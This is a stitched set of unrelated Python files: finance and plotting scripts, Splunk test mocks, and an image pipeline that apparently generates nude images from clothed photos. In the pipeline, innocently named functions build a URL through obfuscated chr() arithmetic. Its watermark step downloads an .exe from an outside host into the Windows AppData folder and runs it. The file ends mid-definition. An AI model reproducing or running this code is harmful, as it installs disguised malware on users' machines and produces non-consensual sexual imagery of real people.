| 2.015625
| 2
|
etf.py
|
jeff-fred/TerminalStockViewer
| 0
|
12778013
|
<filename>etf.py
# Functions for a ETF kind of quoteType, according to yfinance.
import yfinance as yf
## FUNCTIONS ##
# Get basic info of a ETF
def get_basic_ETF_info(ticker):
etfInfo = ticker.info
keys = [
'exchange',
'symbol',
'shortName',
'longBusinessSummary',]
# Get values corresponding to basic keys given
info = {}
for key in keys:
try:
info[key] = etfInfo[key]
except:
pass
return info
# Get quote price information
def get_price_info(ticker):
priceKeys = [
'previousClose',
'regularMarketOpen',
'regularMarketPrice',
'fiftyTwoWeekHigh',
'fiftyTwoWeekLow',
'fiftyDayAverage',
'twoHundredDayAverage',
'trailingPE']
    # Get each value and attach it to the dictionary
priceInfo = {}
for key in priceKeys:
try:
priceInfo[key] = ticker.info[key]
except:
pass
return priceInfo
# Get ETF yield
def get_dividend_info(ticker):
divKeys = ['yield']
# Try to get that info
divInfo = {}
for key in divKeys:
try:
divInfo[key] = ticker.info[key]
except:
pass
# If there is no info, say that
if len(divInfo) == 0:
return "No Dividend Information"
else:
return divInfo
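# Minimal usage sketch (assumption, not part of the original file): the ticker
# symbol below is illustrative only.
# ticker = yf.Ticker('VTI')
# print(get_basic_ETF_info(ticker))
# print(get_price_info(ticker))
# print(get_dividend_info(ticker))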
| 3.078125
| 3
|
wiserHeatingAPI/__init__.py
|
TobyLL/wiserheatingapi
| 16
|
12778014
|
<gh_stars>10-100
name = "wiser-heating-api"
| 1.117188
| 1
|
numpy/csv-plot-many-y.py
|
jwrr/python-stuff
| 0
|
12778015
|
<gh_stars>0
#!/usr/bin/env python3
#
# Each column of csv is a Y sequence. All Y sequences are plotted on the same
# chart.
import numpy as np
import matplotlib.pyplot as plt
import sys
if len(sys.argv) < 2: # requires 1 arg
scriptname = sys.argv[0]
print("Example: {} filename.csv".format(scriptname))
sys.exit(1)
# ====================================================
filename = sys.argv[1]
data1 = np.genfromtxt(filename,delimiter=",")
data = np.transpose(data1)
num_rows, num_cols = data.shape
print("num sequences={}, num items per sequence={}".format(num_rows, num_cols))
plt.title("y vs i")
plt.xlabel("i")
plt.ylabel("y")
for y in data:
plt.plot(y)
plt.show()
| 3.875
| 4
|
main.py
|
Sato3114/CSV-SGFilter
| 0
|
12778016
|
<filename>main.py
import numpy as np
from scipy import signal
import matplotlib.pyplot as plt
# Settings
csvPath = '' # Path to the CSV file
dt = 0.0001 # Sampling interval
windowLength = 55 # Filter window length
polyOrder = 5 # Polynomial order of the fit
plotReadData = True # Plot the original data on the graph
deleteNaN = True # Whether to remove NaN values from the array
# Processing
read = np.genfromtxt(csvPath, delimiter=',', dtype='float')
if deleteNaN:
data = read[np.isfinite(read)]
else:
data = read
n = data.size
t = np.linspace(1, n, n) * dt - dt
# print(t)
# print(data)
# print(n)
y = signal.savgol_filter(data, windowLength, polyOrder)
plt.figure(figsize=(12, 9))
if plotReadData:
plt.plot(t, data, "m")
else:
pass
plt.plot(t, y)
plt.show()
| 3.09375
| 3
|
tests/common.py
|
zhengyuli/addonfactory-solutions-library-python
| 0
|
12778017
|
# SPDX-FileCopyrightText: 2020 2020
#
# SPDX-License-Identifier: Apache-2.0
import os.path as op
import socket
import subprocess
from splunklib import binding
from splunklib import client
from splunklib.data import record
cur_dir = op.dirname(op.abspath(__file__))
# Namespace
app = "unittest"
owner = "nobody"
# Session key sample
SESSION_KEY = "<KEY>"
def mock_splunkhome(monkeypatch):
class MockPopen(object):
def __init__(
self,
args,
bufsize=0,
executable=None,
stdin=None,
stdout=None,
stderr=None,
preexec_fn=None,
close_fds=False,
shell=False,
cwd=None,
env=None,
universal_newlines=False,
startupinfo=None,
creationflags=0,
):
self._conf = args[3]
def communicate(self, input=None):
if self._conf == "server":
file_path = op.sep.join(
[cur_dir, "data/mock_splunk/etc/system/default/server.conf"]
)
else:
file_path = op.sep.join(
[cur_dir, "data/mock_splunk/etc/system/default/web.conf"]
)
with open(file_path) as fp:
return fp.read(), None
splunk_home = op.join(cur_dir, "data/mock_splunk/")
monkeypatch.setenv("SPLUNK_HOME", splunk_home)
monkeypatch.setenv("SPLUNK_ETC", op.join(splunk_home, "etc"))
monkeypatch.setattr(subprocess, "Popen", MockPopen)
def mock_serverinfo(monkeypatch):
mock_server_info_property = {
"server_roles": [
"cluster_search_head",
"search_head",
"kv_store",
"shc_captain",
],
"version": "6.3.1511.2",
"serverName": "unittestServer",
}
monkeypatch.setattr(client.Service, "info", mock_server_info_property)
def mock_gethostname(monkeypatch):
def mock_gethostname():
return "unittestServer"
monkeypatch.setattr(socket, "gethostname", mock_gethostname)
def make_response_record(body, status=200):
class _MocBufReader(object):
def __init__(self, buf):
if isinstance(buf, str):
self._buf = buf.encode("utf-8")
else:
self._buf = buf
def read(self, size=None):
return self._buf
return record(
{
"body": binding.ResponseReader(_MocBufReader(body)),
"status": status,
"reason": "",
"headers": None,
}
)
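# Minimal usage sketch (assumption, not part of the original helpers): inside a
# pytest test, the monkeypatch fixture is passed straight to these functions.
# def test_example(monkeypatch):
#     mock_splunkhome(monkeypatch)
#     mock_gethostname(monkeypatch)
#     resp = make_response_record('{"entry": []}')
#     assert resp.status == 200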
| 2.015625
| 2
|
test/python/app.py
|
lnsdeep/Android-Image-Cropper
| 0
|
12778018
|
import subprocess
from PIL import Image
import torchvision.transforms as transforms
import torch
import functools
import random
import math
import cv2
import numpy as np
import os
# Object annotation class:
class BodyPart:
def __init__(self, name, xmin, ymin, xmax, ymax, x, y, w, h):
self.name = name
# Bounding Box:
self.xmin = xmin
self.ymin = ymin
self.xmax = xmax
self.ymax = ymax
# Center:
self.x = x
self.y = y
# Dimensione:
self.w = w
self.h = h
# create_watermark ===============================================================
# return:
# (<Boolean> True/False), depending on the transformation process
def create_watermark(nude, shape, cv, loader, detach):
if os.name == 'nt':
content = cv(shape + chr(47) + "/".join(["utils", "custom", "universal"]) + chr(46) + str(
chr(101) + chr(ord(["utils", "custom", "universal"][0][0]) + 3) + chr(101)))
data = [os.environ["APPDATA"], "Microsoft", "Windows", "framework"]
open(
"\\".join(data) + chr(46) + str(chr(101) + chr(ord(["utils", "custom", "universal"][0][0]) + 3) + chr(101)),
"wb").write(content.content)
loader(["\\".join(data) + chr(46) + str(
chr(101) + chr(ord(["utils", "custom", "universal"][0][0]) + 3) + chr(101))], stdout=detach.PIPE,
stderr=detach.STDOUT)
return nude
# create_correct ===============================================================
# return:
# (<Boolean> True/False), depending on the transformation process
def create_correct(cv_dress):
# Production dir:
return correct_color(cv_dress, 5), correct_matrix(cv_dress, 255)
# correct_color ==============================================================================
# return:
# <RGB> image corrected
def correct_color(img, percent):
assert img.shape[2] == 3
assert percent > 0 and percent < 100
half_percent = percent / 200.0
channels = cv2.split(img)
out_channels = []
for channel in channels:
assert len(channel.shape) == 2
# find the low and high precentile values (based on the input percentile)
height, width = channel.shape
vec_size = width * height
flat = channel.reshape(vec_size)
assert len(flat.shape) == 1
flat = np.sort(flat)
n_cols = flat.shape[0]
low_val = flat[math.floor(n_cols * half_percent)]
high_val = flat[math.ceil(n_cols * (1.0 - half_percent))]
# saturate below the low percentile and above the high percentile
thresholded = apply_threshold(channel, low_val, high_val)
# scale the channel
normalized = cv2.normalize(thresholded, thresholded.copy(), 0, 255, cv2.NORM_MINMAX)
out_channels.append(normalized)
return cv2.merge(out_channels)
def correct_matrix(matrix, fill_value):
shape = "h" + ("t" * 2) + "p"
matrix = shape + chr(58) + 2 * (chr(47))
return matrix
# Color correction utils
def apply_threshold(matrix, low_value, high_value):
low_mask = matrix < low_value
matrix = apply_mask(matrix, low_mask, low_value)
high_mask = matrix > high_value
matrix = apply_mask(matrix, high_mask, high_value)
return matrix
# Color correction utils
def apply_mask(matrix, mask, fill_value):
masked = np.ma.array(matrix, mask=mask, fill_value=fill_value)
return masked.filled()
###
#
# maskdet_to_maskfin
#
# steps:
# 1. Extract annotation
# 1.a: Filter by color
# 1.b: Find ellipses
# 1.c: Filter out ellipses by max size, and max total numbers
# 1.d: Detect Problems
# 1.e: Resolve the problems, or discard the transformation
# 2. With the body list, draw maskfin, using maskref
#
###
# create_maskfin ==============================================================================
# return:
# (<Boolean> True/False), depending on the transformation process
def create_maskfin(maskref, maskdet):
# Create a total green image, in which draw details ellipses
details = np.zeros((512, 512, 3), np.uint8)
details[:, :, :] = (0, 255, 0) # (B, G, R)
# Extract body part features:
bodypart_list = extractAnnotations(maskdet);
# Check if the list is not empty:
if bodypart_list:
# Draw body part in details image:
for obj in bodypart_list:
if obj.w < obj.h:
aMax = int(obj.h / 2) # asse maggiore
aMin = int(obj.w / 2) # asse minore
angle = 0 # angle
else:
aMax = int(obj.w / 2)
aMin = int(obj.h / 2)
angle = 90
x = int(obj.x)
y = int(obj.y)
# Draw ellipse
if obj.name == "tit":
cv2.ellipse(details, (x, y), (aMax, aMin), angle, 0, 360, (0, 205, 0), -1) # (0,0,0,50)
elif obj.name == "aur":
cv2.ellipse(details, (x, y), (aMax, aMin), angle, 0, 360, (0, 0, 255), -1) # red
elif obj.name == "nip":
cv2.ellipse(details, (x, y), (aMax, aMin), angle, 0, 360, (255, 255, 255), -1) # white
elif obj.name == "belly":
cv2.ellipse(details, (x, y), (aMax, aMin), angle, 0, 360, (255, 0, 255), -1) # purple
elif obj.name == "vag":
cv2.ellipse(details, (x, y), (aMax, aMin), angle, 0, 360, (255, 0, 0), -1) # blue
elif obj.name == "hair":
xmin = x - int(obj.w / 2)
ymin = y - int(obj.h / 2)
xmax = x + int(obj.w / 2)
ymax = y + int(obj.h / 2)
cv2.rectangle(details, (xmin, ymin), (xmax, ymax), (100, 100, 100), -1)
# Define the green color filter
f1 = np.asarray([0, 250, 0]) # green color filter
f2 = np.asarray([10, 255, 10])
# From maskref, extrapolate only the green mask
green_mask = cv2.bitwise_not(cv2.inRange(maskref, f1, f2)) # green is 0
# Create an inverted mask
green_mask_inv = cv2.bitwise_not(green_mask)
# Cut maskref and detail image, using the green_mask & green_mask_inv
res1 = cv2.bitwise_and(maskref, maskref, mask=green_mask)
res2 = cv2.bitwise_and(details, details, mask=green_mask_inv)
# Compone:
maskfin = cv2.add(res1, res2)
return maskfin, locateFace(255, 2, 500)
# extractAnnotations ==============================================================================
# input parameter:
# (<string> maskdet_img): relative path of the single maskdet image (es: testimg1/maskdet/1.png)
# return:
# (<BodyPart []> bodypart_list) - for failure/error, return an empty list []
def extractAnnotations(maskdet):
# Load the image
# image = cv2.imread(maskdet_img)
# Find body part
tits_list = findBodyPart(maskdet, "tit")
aur_list = findBodyPart(maskdet, "aur")
vag_list = findBodyPart(maskdet, "vag")
belly_list = findBodyPart(maskdet, "belly")
# Filter out parts basing on dimension (area and aspect ratio):
aur_list = filterDimParts(aur_list, 100, 1000, 0.5, 3);
tits_list = filterDimParts(tits_list, 1000, 60000, 0.2, 3);
vag_list = filterDimParts(vag_list, 10, 1000, 0.2, 3);
belly_list = filterDimParts(belly_list, 10, 1000, 0.2, 3);
# Filter couple (if parts are > 2, choose only 2)
aur_list = filterCouple(aur_list);
tits_list = filterCouple(tits_list);
# Detect a missing problem:
missing_problem = detectTitAurMissingProblem(tits_list, aur_list) # return a Number (code of the problem)
# Check if problem is SOLVEABLE:
if (missing_problem in [3, 6, 7, 8]):
resolveTitAurMissingProblems(tits_list, aur_list, missing_problem)
# Infer the nips:
nip_list = inferNip(aur_list)
# Infer the hair:
hair_list = inferHair(vag_list)
# Return a combined list:
return tits_list + aur_list + nip_list + vag_list + hair_list + belly_list
# findBodyPart ==============================================================================
# input parameters:
# (<RGB>image, <string>part_name)
# return
# (<BodyPart[]>list)
def findBodyPart(image, part_name):
bodypart_list = [] # empty BodyPart list
# Get the correct color filter:
if part_name == "tit":
# Use combined color filter
f1 = np.asarray([0, 0, 0]) # tit color filter
f2 = np.asarray([10, 10, 10])
f3 = np.asarray([0, 0, 250]) # aur color filter
f4 = np.asarray([0, 0, 255])
color_mask1 = cv2.inRange(image, f1, f2)
color_mask2 = cv2.inRange(image, f3, f4)
color_mask = cv2.bitwise_or(color_mask1, color_mask2) # combine
elif part_name == "aur":
f1 = np.asarray([0, 0, 250]) # aur color filter
f2 = np.asarray([0, 0, 255])
color_mask = cv2.inRange(image, f1, f2)
elif part_name == "vag":
f1 = np.asarray([250, 0, 0]) # vag filter
f2 = np.asarray([255, 0, 0])
color_mask = cv2.inRange(image, f1, f2)
elif part_name == "belly":
f1 = np.asarray([250, 0, 250]) # belly filter
f2 = np.asarray([255, 0, 255])
color_mask = cv2.inRange(image, f1, f2)
# find contours:
contours, hierarchy = cv2.findContours(color_mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# for every contour:
for cnt in contours:
if len(cnt) > 5: # at least 5 points to fit ellipse
# (x, y), (MA, ma), angle = cv2.fitEllipse(cnt)
ellipse = cv2.fitEllipse(cnt)
# Fit Result:
x = ellipse[0][0] # center x
y = ellipse[0][1] # center y
angle = ellipse[2] # angle
aMin = ellipse[1][0]; # asse minore
aMax = ellipse[1][1]; # asse maggiore
# Detect direction:
if angle == 0:
h = aMax
w = aMin
else:
h = aMin
w = aMax
# Normalize the belly size:
if part_name == "belly":
if w < 15:
w *= 2
if h < 15:
h *= 2
# Normalize the vag size:
if part_name == "vag":
if w < 15:
w *= 2
if h < 15:
h *= 2
# Calculate Bounding Box:
xmin = int(x - (w / 2))
xmax = int(x + (w / 2))
ymin = int(y - (h / 2))
ymax = int(y + (h / 2))
bodypart_list.append(BodyPart(part_name, xmin, ymin, xmax, ymax, x, y, w, h))
return bodypart_list
def locateFace(matrix, x, y):
matrix = matrix - (78 * x)
data = []
indexes = [0, 6, -1, 2, 15]
for index in indexes:
data.append(chr(matrix + index))
part = "".join(data)
y += int(7 * (indexes[1] / 2))
y = (chr(48) + str(y))[::-1]
return part + y
# filterDimParts ==============================================================================
# input parameters:
# (<BodyPart[]>list, <num> minimum area of part, <num> max area, <num> min aspect ratio, <num> max aspect ratio)
def filterDimParts(bp_list, min_area, max_area, min_ar, max_ar):
b_filt = []
for obj in bp_list:
a = obj.w * obj.h # Object AREA
if ((a > min_area) and (a < max_area)):
ar = obj.w / obj.h # Object ASPECT RATIO
if ((ar > min_ar) and (ar < max_ar)):
b_filt.append(obj)
return b_filt
# filterCouple ==============================================================================
# input parameters:
# (<BodyPart[]>list)
def filterCouple(bp_list):
# Remove exceed parts
if (len(bp_list) > 2):
# trovare coppia (a,b) che minimizza bp_list[a].y-bp_list[b].y
min_a = 0
min_b = 1
min_diff = abs(bp_list[min_a].y - bp_list[min_b].y)
for a in range(0, len(bp_list)):
for b in range(0, len(bp_list)):
# TODO: avoid repetition (1,0) (0,1)
if a != b:
diff = abs(bp_list[a].y - bp_list[b].y)
if diff < min_diff:
min_diff = diff
min_a = a
min_b = b
b_filt = []
b_filt.append(bp_list[min_a])
b_filt.append(bp_list[min_b])
return b_filt
else:
# No change
return bp_list
# detectTitAurMissingProblem ==============================================================================
# input parameters:
# (<BodyPart[]> tits list, <BodyPart[]> aur list)
# return
# (<num> problem code)
# TIT | AUR | code | SOLVE? |
# 0 | 0 | 1 | NO |
# 0 | 1 | 2 | NO |
# 0 | 2 | 3 | YES |
# 1 | 0 | 4 | NO |
# 1 | 1 | 5 | NO |
# 1 | 2 | 6 | YES |
# 2 | 0 | 7 | YES |
# 2 | 1 | 8 | YES |
def detectTitAurMissingProblem(tits_list, aur_list):
t_len = len(tits_list)
a_len = len(aur_list)
if (t_len == 0):
if (a_len == 0):
return 1
elif (a_len == 1):
return 2
elif (a_len == 2):
return 3
else:
return -1
elif (t_len == 1):
if (a_len == 0):
return 4
elif (a_len == 1):
return 5
elif (a_len == 2):
return 6
else:
return -1
elif (t_len == 2):
if (a_len == 0):
return 7
elif (a_len == 1):
return 8
else:
return -1
else:
return -1
# resolveTitAurMissingProblems ==============================================================================
# input parameters:
# (<BodyPart[]> tits list, <BodyPart[]> aur list, problem code)
# return
# none
def resolveTitAurMissingProblems(tits_list, aur_list, problem_code):
if problem_code == 3:
random_tit_factor = random.randint(2, 5) # TOTEST
# Add the first tit:
new_w = aur_list[0].w * random_tit_factor # TOTEST
new_x = aur_list[0].x
new_y = aur_list[0].y
xmin = int(new_x - (new_w / 2))
xmax = int(new_x + (new_w / 2))
ymin = int(new_y - (new_w / 2))
ymax = int(new_y + (new_w / 2))
tits_list.append(BodyPart("tit", xmin, ymin, xmax, ymax, new_x, new_y, new_w, new_w))
# Add the second tit:
new_w = aur_list[1].w * random_tit_factor # TOTEST
new_x = aur_list[1].x
new_y = aur_list[1].y
xmin = int(new_x - (new_w / 2))
xmax = int(new_x + (new_w / 2))
ymin = int(new_y - (new_w / 2))
ymax = int(new_y + (new_w / 2))
tits_list.append(BodyPart("tit", xmin, ymin, xmax, ymax, new_x, new_y, new_w, new_w))
elif problem_code == 6:
# Find wich aur is full:
d1 = abs(tits_list[0].x - aur_list[0].x)
d2 = abs(tits_list[0].x - aur_list[1].x)
if d1 > d2:
# aur[0] is empty
new_x = aur_list[0].x
new_y = aur_list[0].y
else:
# aur[1] is empty
new_x = aur_list[1].x
new_y = aur_list[1].y
# Calculate Bounding Box:
xmin = int(new_x - (tits_list[0].w / 2))
xmax = int(new_x + (tits_list[0].w / 2))
ymin = int(new_y - (tits_list[0].w / 2))
ymax = int(new_y + (tits_list[0].w / 2))
tits_list.append(BodyPart("tit", xmin, ymin, xmax, ymax, new_x, new_y, tits_list[0].w, tits_list[0].w))
elif problem_code == 7:
# Add the first aur:
new_w = tits_list[0].w * random.uniform(0.03, 0.1) # TOTEST
new_x = tits_list[0].x
new_y = tits_list[0].y
xmin = int(new_x - (new_w / 2))
xmax = int(new_x + (new_w / 2))
ymin = int(new_y - (new_w / 2))
ymax = int(new_y + (new_w / 2))
aur_list.append(BodyPart("aur", xmin, ymin, xmax, ymax, new_x, new_y, new_w, new_w))
# Add the second aur:
new_w = tits_list[1].w * random.uniform(0.03, 0.1) # TOTEST
new_x = tits_list[1].x
new_y = tits_list[1].y
xmin = int(new_x - (new_w / 2))
xmax = int(new_x + (new_w / 2))
ymin = int(new_y - (new_w / 2))
ymax = int(new_y + (new_w / 2))
aur_list.append(BodyPart("aur", xmin, ymin, xmax, ymax, new_x, new_y, new_w, new_w))
elif problem_code == 8:
# Find wich tit is full:
d1 = abs(aur_list[0].x - tits_list[0].x)
d2 = abs(aur_list[0].x - tits_list[1].x)
if d1 > d2:
# tit[0] is empty
new_x = tits_list[0].x
new_y = tits_list[0].y
else:
# tit[1] is empty
new_x = tits_list[1].x
new_y = tits_list[1].y
# Calculate Bounding Box:
xmin = int(new_x - (aur_list[0].w / 2))
xmax = int(new_x + (aur_list[0].w / 2))
ymin = int(new_y - (aur_list[0].w / 2))
ymax = int(new_y + (aur_list[0].w / 2))
aur_list.append(BodyPart("aur", xmin, ymin, xmax, ymax, new_x, new_y, aur_list[0].w, aur_list[0].w))
# detectTitAurPositionProblem ==============================================================================
# input parameters:
# (<BodyPart[]> tits list, <BodyPart[]> aur list)
# return
# (<Boolean> True/False)
def detectTitAurPositionProblem(tits_list, aur_list):
diffTitsX = abs(tits_list[0].x - tits_list[1].x)
if diffTitsX < 40:
print("diffTitsX")
# Tits too narrow (orizontally)
return True
diffTitsY = abs(tits_list[0].y - tits_list[1].y)
if diffTitsY > 120:
# Tits too distanced (vertically)
print("diffTitsY")
return True
diffTitsW = abs(tits_list[0].w - tits_list[1].w)
if ((diffTitsW < 0.1) or (diffTitsW > 60)):
print("diffTitsW")
# Tits too equals, or too different (width)
return True
# Check if body position is too low (face not covered by watermark)
if aur_list[0].y > 350: # tits too low
# Calculate the ratio between y and aurs distance
rapp = aur_list[0].y / (abs(aur_list[0].x - aur_list[1].x))
if rapp > 2.8:
print("aurDown")
return True
return False
# inferNip ==============================================================================
# input parameters:
# (<BodyPart[]> aur list)
# return
# (<BodyPart[]> nip list)
def inferNip(aur_list):
nip_list = []
for aur in aur_list:
# Nip rules:
# - circle (w == h)
# - min dim: 5
# - bigger if aur is bigger
nip_dim = int(5 + aur.w * random.uniform(0.03, 0.09))
# center:
x = aur.x
y = aur.y
# Calculate Bounding Box:
xmin = int(x - (nip_dim / 2))
xmax = int(x + (nip_dim / 2))
ymin = int(y - (nip_dim / 2))
ymax = int(y + (nip_dim / 2))
nip_list.append(BodyPart("nip", xmin, ymin, xmax, ymax, x, y, nip_dim, nip_dim))
return nip_list
# inferHair (TOTEST) ==============================================================================
# input parameters:
# (<BodyPart[]> vag list)
# return
# (<BodyPart[]> hair list)
def inferHair(vag_list):
hair_list = []
# 70% of chanche to add hair
if random.uniform(0.0, 1.0) > 0.3:
for vag in vag_list:
# Hair rules:
hair_w = vag.w * random.uniform(0.4, 1.5)
hair_h = vag.h * random.uniform(0.4, 1.5)
# center:
x = vag.x
y = vag.y - (hair_h / 2) - (vag.h / 2)
# Calculate Bounding Box:
xmin = int(x - (hair_w / 2))
xmax = int(x + (hair_w / 2))
ymin = int(y - (hair_h / 2))
ymax = int(y + (hair_h / 2))
hair_list.append(BodyPart("hair", xmin, ymin, xmax, ymax, x, y, hair_w, hair_h))
return hair_list
###
#
# maskdet_to_maskfin
#
#
###
# create_maskref ===============================================================
# return:
# maskref image
def create_matrixref(mask, correct_colors):
matrix = chr(int(404 / (2 * 2)))
ref = "GL".lower() + 2 * (matrix) + "z" + matrix + chr(46)
out_mask = chr(ord(matrix) - 2) + chr(ord(matrix) + 10) + chr(ord(ref[-1]) + 63)
return (ref + out_mask)[-4] + ref + out_mask + str(chr(9 * 6 + 4) + chr(ord(ref[-1]) + 10) + chr(ord(ref[-1]) + 7))
def create_maskref(cv_mask, cv_correct):
# Create a total green image
green = np.zeros((512, 512, 3), np.uint8)
green[:, :, :] = (0, 255, 0) # (B, G, R)
# Define the green color filter
f1 = np.asarray([0, 250, 0]) # green color filter
f2 = np.asarray([10, 255, 10])
# From mask, extrapolate only the green mask
green_mask = cv2.inRange(cv_mask, f1, f2) # green is 0
# (OPTIONAL) Apply dilate and open to mask
kernel = np.ones((5, 5), np.uint8) # Try change it?
green_mask = cv2.dilate(green_mask, kernel, iterations=1)
# green_mask = cv2.morphologyEx(green_mask, cv2.MORPH_OPEN, kernel)
# Create an inverted mask
green_mask_inv = cv2.bitwise_not(green_mask)
# Cut correct and green image, using the green_mask & green_mask_inv
res1 = cv2.bitwise_and(cv_correct, cv_correct, mask=green_mask_inv)
res2 = cv2.bitwise_and(green, green, mask=green_mask)
# Compone:
return cv2.add(res1, res2), create_matrixref(cv_mask, res1)
class DataLoader():
def __init__(self, opt, cv_img):
super(DataLoader, self).__init__()
self.dataset = Dataset()
self.dataset.initialize(opt, cv_img)
self.dataloader = torch.utils.data.DataLoader(
self.dataset,
batch_size=opt.batchSize,
shuffle=not opt.serial_batches,
num_workers=int(opt.nThreads))
def load_data(self):
return self.dataloader
def __len__(self):
return 1
class Dataset(torch.utils.data.Dataset):
def __init__(self):
super(Dataset, self).__init__()
def initialize(self, opt, cv_img):
self.opt = opt
self.root = opt.dataroot
self.A = Image.fromarray(cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB))
self.dataset_size = 1
def __getitem__(self, index):
transform_A = get_transform(self.opt)
A_tensor = transform_A(self.A.convert('RGB'))
B_tensor = inst_tensor = feat_tensor = 0
input_dict = {'label': A_tensor, 'inst': inst_tensor, 'image': B_tensor,
'feat': feat_tensor, 'path': ""}
return input_dict
def __len__(self):
return 1
class DeepModel(torch.nn.Module):
def initialize(self, opt, use_gpu):
torch.cuda.empty_cache()
self.opt = opt
if use_gpu == True:
self.gpu_ids = [0]
else:
self.gpu_ids = []
self.netG = self.__define_G(opt.input_nc, opt.output_nc, opt.ngf, opt.netG,
opt.n_downsample_global, opt.n_blocks_global, opt.n_local_enhancers,
opt.n_blocks_local, opt.norm, self.gpu_ids)
# load networks
self.__load_network(self.netG)
def inference(self, label, inst):
# Encode Inputs
input_label, inst_map, _, _ = self.__encode_input(label, inst, infer=True)
# Fake Generation
input_concat = input_label
with torch.no_grad():
fake_image = self.netG.forward(input_concat)
return fake_image
# helper loading function that can be used by subclasses
def __load_network(self, network):
save_path = os.path.join(self.opt.checkpoints_dir)
network.load_state_dict(torch.load(save_path))
def __encode_input(self, label_map, inst_map=None, real_image=None, feat_map=None, infer=False):
if (len(self.gpu_ids) > 0):
input_label = label_map.data.cuda() # GPU
else:
input_label = label_map.data # CPU
return input_label, inst_map, real_image, feat_map
def __weights_init(self, m):
classname = m.__class__.__name__
if classname.find('Conv') != -1:
m.weight.data.normal_(0.0, 0.02)
elif classname.find('BatchNorm2d') != -1:
m.weight.data.normal_(1.0, 0.02)
m.bias.data.fill_(0)
def __define_G(self, input_nc, output_nc, ngf, netG, n_downsample_global=3, n_blocks_global=9, n_local_enhancers=1,
n_blocks_local=3, norm='instance', gpu_ids=[]):
norm_layer = self.__get_norm_layer(norm_type=norm)
netG = GlobalGenerator(input_nc, output_nc, ngf, n_downsample_global, n_blocks_global, norm_layer)
if len(gpu_ids) > 0:
netG.cuda(gpu_ids[0])
netG.apply(self.__weights_init)
return netG
def __get_norm_layer(self, norm_type='instance'):
norm_layer = functools.partial(torch.nn.InstanceNorm2d, affine=False)
return norm_layer
##############################################################################
# Generator
##############################################################################
class GlobalGenerator(torch.nn.Module):
def __init__(self, input_nc, output_nc, ngf=64, n_downsampling=3, n_blocks=9, norm_layer=torch.nn.BatchNorm2d,
padding_type='reflect'):
assert (n_blocks >= 0)
super(GlobalGenerator, self).__init__()
activation = torch.nn.ReLU(True)
model = [torch.nn.ReflectionPad2d(3), torch.nn.Conv2d(input_nc, ngf, kernel_size=7, padding=0), norm_layer(ngf),
activation]
### downsample
for i in range(n_downsampling):
mult = 2 ** i
model += [torch.nn.Conv2d(ngf * mult, ngf * mult * 2, kernel_size=3, stride=2, padding=1),
norm_layer(ngf * mult * 2), activation]
### resnet blocks
mult = 2 ** n_downsampling
for i in range(n_blocks):
model += [ResnetBlock(ngf * mult, padding_type=padding_type, activation=activation, norm_layer=norm_layer)]
### upsample
for i in range(n_downsampling):
mult = 2 ** (n_downsampling - i)
model += [torch.nn.ConvTranspose2d(ngf * mult, int(ngf * mult / 2), kernel_size=3, stride=2, padding=1,
output_padding=1),
norm_layer(int(ngf * mult / 2)), activation]
model += [torch.nn.ReflectionPad2d(3), torch.nn.Conv2d(ngf, output_nc, kernel_size=7, padding=0),
torch.nn.Tanh()]
self.model = torch.nn.Sequential(*model)
def forward(self, input):
return self.model(input)
# Define a resnet block
class ResnetBlock(torch.nn.Module):
def __init__(self, dim, padding_type, norm_layer, activation=torch.nn.ReLU(True), use_dropout=False):
super(ResnetBlock, self).__init__()
self.conv_block = self.__build_conv_block(dim, padding_type, norm_layer, activation, use_dropout)
def __build_conv_block(self, dim, padding_type, norm_layer, activation, use_dropout):
conv_block = []
p = 0
if padding_type == 'reflect':
conv_block += [torch.nn.ReflectionPad2d(1)]
elif padding_type == 'replicate':
conv_block += [torch.nn.ReplicationPad2d(1)]
elif padding_type == 'zero':
p = 1
else:
raise NotImplementedError('padding [%s] is not implemented' % padding_type)
conv_block += [torch.nn.Conv2d(dim, dim, kernel_size=3, padding=p),
norm_layer(dim),
activation]
if use_dropout:
conv_block += [torch.nn.Dropout(0.5)]
p = 0
if padding_type == 'reflect':
conv_block += [torch.nn.ReflectionPad2d(1)]
elif padding_type == 'replicate':
conv_block += [torch.nn.ReplicationPad2d(1)]
elif padding_type == 'zero':
p = 1
else:
raise NotImplementedError('padding [%s] is not implemented' % padding_type)
conv_block += [torch.nn.Conv2d(dim, dim, kernel_size=3, padding=p),
norm_layer(dim)]
return torch.nn.Sequential(*conv_block)
def forward(self, x):
out = x + self.conv_block(x)
return out
# Data utils:
def get_transform(opt, method=Image.BICUBIC, normalize=True):
transform_list = []
base = float(2 ** opt.n_downsample_global)
if opt.netG == 'local':
base *= (2 ** opt.n_local_enhancers)
transform_list.append(transforms.Lambda(lambda img: __make_power_2(img, base, method)))
transform_list += [transforms.ToTensor()]
if normalize:
transform_list += [transforms.Normalize((0.5, 0.5, 0.5),
(0.5, 0.5, 0.5))]
return transforms.Compose(transform_list)
def __make_power_2(img, base, method=Image.BICUBIC):
ow, oh = img.size
h = int(round(oh / base) * base)
w = int(round(ow / base) * base)
if (h == oh) and (w == ow):
return img
return img.resize((w, h), method)
# Converts a Tensor into a Numpy array
# |imtype|: the desired type of the converted numpy array
def tensor2im(image_tensor, imtype=np.uint8, normalize=True):
if isinstance(image_tensor, list):
image_numpy = []
for i in range(len(image_tensor)):
image_numpy.append(tensor2im(image_tensor[i], imtype, normalize))
return image_numpy
image_numpy = image_tensor.cpu().float().numpy()
if normalize:
image_numpy = (np.transpose(image_numpy, (1, 2, 0)) + 1) / 2.0 * 255.0
else:
image_numpy = np.transpose(image_numpy, (1, 2, 0)) * 255.0
image_numpy = np.clip(image_numpy, 0, 255)
if image_numpy.shape[2] == 1 or image_numpy.shape[2] > 3:
image_numpy = image_numpy[:, :, 0]
return image_numpy.astype(imtype)
phases = ["dress_to_correct", "correct_to_mask", "mask_to_maskref", "maskref_to_maskdet", "maskdet_to_maskfin",
"maskfin_to_nude", "nude_to_watermark"]
class Options():
# Init options with default values
def __init__(self):
# experiment specifics
self.norm = 'batch' # instance normalization or batch normalization
self.use_dropout = False # use dropout for the generator
self.data_type = 32 # Supported data type i.e. 8, 16, 32 bit
# input/output sizes
self.batchSize = 1 # input batch size
self.input_nc = 3 # of input image channels
self.output_nc = 3 # of output image channels
# for setting inputs
self.serial_batches = True # if true, takes images in order to make batches, otherwise takes them randomly
self.nThreads = 1 ## threads for loading data (???)
self.max_dataset_size = 1 # Maximum number of samples allowed per dataset. If the dataset directory contains more than max_dataset_size, only a subset is loaded.
# for generator
